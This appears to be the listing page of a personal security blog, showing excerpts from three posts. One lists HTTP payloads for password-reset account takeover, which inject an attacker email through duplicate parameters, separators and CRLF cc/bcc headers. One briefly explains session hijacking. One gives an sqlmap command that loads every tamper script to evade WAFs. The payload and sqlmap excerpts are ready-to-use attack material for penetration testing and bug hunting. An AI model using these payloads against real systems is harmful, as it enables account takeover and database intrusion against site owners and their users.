4 Years :-) I got a full-time job and just couldn't get enough time to update the blog, but I promise to keep posting off and on now. Life’s Good Alhamdulillah! Cheers & Happy 2026!
Posts
Account Takeover: Password Reset With Manipulating Email Parameter
Exploitation

Add attacker email as second parameter using &

    POST /resetPassword
    [...]
    email=victim@email.com&email=attacker@email.com

Add attacker email as second parameter using %20

    POST /resetPassword
    [...]
    email=victim@email.com%20email=attacker@email.com

Add attacker email as second parameter using |

    POST /resetPassword
    [...]
    email=victim@email.com|email=attacker@email.com

Add attacker email as second parameter using cc

    POST /resetPassword
    [...]
    email="victim@mail.tld%0a%0dcc:attacker@mail.tld"

Add attacker email as second parameter using bcc

    POST /resetPassword
    [...]
    email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"

Add attacker email as second parameter using ,

    POST /resetPassword
    [...]
    email="victim@mail.tld",email="attacker@mail.tld"

Add attacker email as second parameter in json ar...
What is Session Hijacking
Session hijacking is a combination of interception and injection. It allows an attacker to avoid password protections by taking over an existing connection once authentication is complete. For example, if I am sniffing your network, I might be aware that you have a Telnet session between your network management system on address 10.0.0.1 and your key system 10.0.0.100. If I send a series of packets to the NMS on 10.0.0.1 that causes you to drop the connection but at the same time continue to send packets to 10.0.0.100 with a spoofed address of 10.0.0.1, I have hijacked the session.
SQLMAP Tamper Scripts WAF bypass
Use and load all tamper scripts to evade filters and WAF:

    sqlmap -u 'http://www.site.com/search.cmd?form_state=1' --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

General Tamper testing:

    tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus...